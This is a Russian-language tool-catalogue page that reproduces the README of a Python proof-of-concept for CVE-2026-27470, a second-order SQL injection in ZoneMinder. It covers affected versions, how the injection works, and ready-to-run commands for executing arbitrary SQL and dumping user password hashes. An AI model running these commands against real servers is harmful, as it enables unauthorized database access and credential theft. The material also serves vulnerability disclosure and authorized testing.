Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-27470-POC — Python PoC для CVE-2026-27470, аутентифицированная SQL-инъекция второго порядка в getNearEvents() (status.php) в ZoneMinder, CVSS 8.8 | Kitploit
Инструменты/GitHubGitHub/d3vn0mi/cve-2026-27470-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubd3vn0mi/cve-2026-27470-poc

CVE-2026-27470-POC

Python PoC для CVE-2026-27470, аутентифицированная SQL-инъекция второго порядка в getNearEvents() (status.php) в ZoneMinder, CVSS 8.8

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-27470 — PoC SQL-инъекции второго порядка в ZoneMinder

Автор: d3vn0mi | CVSS 8.8 | Требуется аутентификация | Требуется разрешение Events

Обзор

CVE-2026-27470 — это уязвимость SQL-инъекции второго порядка в web/ajax/status.php ZoneMinder, а именно в функции getNearEvents().

ДетальЗначение
ЗатронутоZoneMinder <= 1.36.37 и 1.37.61 – 1.38.0
Исправлено в1.36.38 / 1.38.1
ТипSQL-инъекция второго порядка
Требуется аутентификацияДа (любой пользователь с разрешением Events)
CVSS8.8 (Высокий)

Как это работает

Уязвимость представляет собой SQL-инъекцию в два этапа (второго порядка):

  1. Этап 1 — Сохранение: Злоумышленник переименовывает событие (или изменяет его поле Cause), чтобы внедрить SQL-полезную нагрузку. ZoneMinder использует параметризованный запрос для этой записи, поэтому полезная нагрузка безопасно сохраняется в базе данных — ни WAF, ни фильтры её не блокируют.

  2. Этап 2 — Запуск: Злоумышленник запрашивает сущность nearevents через API статуса. Функция getNearEvents() считывает сохранённые Name/Cause события из базы данных и напрямую конкатенирует их в новый SQL-запрос без санитизации, что приводит к SQL-инъекции.

Поскольку вектор инъекции (сохранённые данные) отделён от триггера (чистый GET-запрос), это обходит большинство защит на уровне ввода.

Установка

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-27470-POC.git
cd CVE-2026-27470-POC
pip install -r requirements.txt

Использование

Базовое — Получение версии базы данных

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password

Пользовательский SQL-запрос

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"

Выгрузка всех пользователей и хэшей паролей

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users

Учётные данные по умолчанию сохраняются в dumped_creds.txt.

Сохранение результатов в пользовательский файл

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o loot.txt
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT @@datadir" -o result.txt

Маршрутизация через прокси (Burp / mitmproxy)

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --proxy http://127.0.0.1:8080

Использование поля Cause вместо Name

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --field Cause --query "SELECT database()"

Указание ID события вручную

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --event-id 42

Подробный / отладочный вывод

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password -v

Параметры

ФлагОписаниеПо умолчанию
-t, --targetURL цели(обязательно)
-u, --usernameИмя пользователя ZoneMinder(обязательно)
-p, --passwordПароль ZoneMinder(обязательно)
--querySQL-запрос для выполненияSELECT VERSION()
--dump-usersВыгрузить все имена пользователей и хэши паролей
-o, --outputСохранить результаты в файлdumped_creds.txt
--event-idID события, используемого как носитель инъекции(автоопределение)
--fieldПоле инъекции: Name или CauseName
--no-restoreНе восстанавливать имя события после эксплуатации
--proxyURL HTTP-прокси
--timeoutТаймаут запроса в секундах30
-v, --verboseВключить отладочное логирование

Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованных исследований безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Ссылки

  • Официальный сайт ZoneMinder
  • Репозиторий ZoneMinder на GitHub
Скачать инструмент